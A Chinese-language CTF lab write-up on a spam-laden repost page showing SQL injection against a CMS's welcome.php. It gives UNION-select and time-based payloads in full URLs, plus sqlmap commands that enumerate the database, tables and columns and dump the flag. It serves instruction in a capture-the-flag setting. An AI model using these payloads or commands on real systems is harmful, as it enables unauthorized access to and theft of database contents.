当前位置: 首页 > news >正文

推广网站排行榜信阳建设网站

news 2026/5/6 12:21:27
推广网站排行榜,信阳建设网站,在建工程项目查询,河东做网站的公司靶标介绍#xff1a; 该CMS的welcome.php中存在SQL注入攻击。 获取登录地址 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com:80 登录注册 注册成功登录进入注册接口 参数接口一 发现接口参数q http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.p…靶标介绍 该CMS的welcome.php中存在SQL注入攻击。 获取登录地址 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com:80 登录注册 注册成功登录进入注册接口 参数接口一 发现接口参数q http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q1 SQL盲注未发现利用点 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q1 or 11 继续下一步 查看接口和参数情况 参数接口二 q step eid  n t等http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid60377db362694n1t34 注入点判断方式 参数后加 参数后加%2b(select*from(select(sleep(20)))a)%2b 参数后加 union select 1,2,3,4,5-- 输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid60377db362694%27%20union%20select%201,2,3,4,5--n1t34 查询数据库名 n2 union select 1,2,database(),4,5-- 输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid60377db362694n2%27%20union%20select%201,2,database(),4,5--n1t34 查看表信息 2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schemactf-- 输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid60377db3626942%27%20union%20select%201,2,group_concat(table_name),4,5%20from%20information_schema.tables%20where%20table_schema%27ctf%27--n1t34 查询表字段信息 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schemactf and table_nameflag-- 输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid60377db3626942%27%20union%20select%201,2,group_concat(column_name),4,5%20from%20information_schema.columns%20where%20table_schema%27ctf%27%20and%20table_name%27flag%27-- 查看flag表中的字段 2 union select 1,2,group_concat(flag),4,5 from flag-- 发现接口参数 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?qquizstep2eid60377db362694 union select 1,2,group_concat(flag),4,5 flag{e5fb9a56-bfce-48cb-a816-77599da3b03a} burusuite使用  burpsuite也是一款强大的漏扫工具通过爬取接口进行扫描发现 接口是否存在安全隐患具体使用教程就不说了看个人习惯 sqlmap使用  暴库 保存txt文件执行 python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -dbs 爆破表  python sqlmap.py -r D:/bc1.txt --batch -D ctf --tables 爆破表字段  python sqlmap.py -r D:/bc1.txt --batch -D ctf -T flag --columns 爆破具体字段信息 执行--batch -D ctf -T flag -C flag --dump flag{e5fb9a56-bfce-48cb-a816-77599da3b03a}  SQL注入寻找接口寻找参数 寻找注入点 进行sql盲注 查看响应结果值 工具可以使用sqlmap bp进行测试验证
http://www.hkea.cn/news/14554790/

相关文章:

  • 学做ps的网站wordpress卸载主题
  • 网站tkd怎么做网络管理系统的组成
  • 什么是网站内链企业的vi设计都包括哪几种
  • 电脑版传奇网站福州自适应网站建设
  • 免费的wordpress能用吗百度运营优化师
  • 站酷设计网站怎样下载图片华为云网站定制
  • 如何给网站开发挂长乐市建设局网站
  • 南宁公司网站建设公司哪家好自己做简单会员管理系统
  • 上海微信网站建设公司电话wordpress首页怎么用ftp修改
  • 网站开发学校 优帮云12网站免费建站
  • 网站建设公司优惠中最近最新在线观看免费高清完整版
  • 运营一个网站一年费用h5百度百科
  • 公司做网站怎么推广做网站一个程序员够吗
  • 开办 网站建设费 科目淘宝网站推广工具
  • 长春火车站最新防疫要求潍坊模板建站定制网站
  • 国家电力安全网站两学一做做网站对象存储
  • 沈阳网站建设syfzkj建筑材料价格信息网
  • 网站策划建设阶段的推广做网站免费的域名
  • 外贸建站模版怎样做商城网站
  • 学做包子馒头的网站远程教育网站开发
  • 掉关键词网站深圳品牌医疗网站建设
  • 做网站收费 知乎深圳最好的公司
  • 管理公司网站设计郴州新网最新招聘
  • 网站建设大图百度一下你就知道了
  • 东营网站建设wordpress管理后台
  • 昆山网站优化国际形势最新消息
  • 温州建站方案网站右下角视频代码
  • 自适应网站是什么在银行网站如何做理财风险评测
  • 轻量级网站开发h5制作网站 有哪些
  • 上海网站建设网站优化app企业网站建设后期维护费用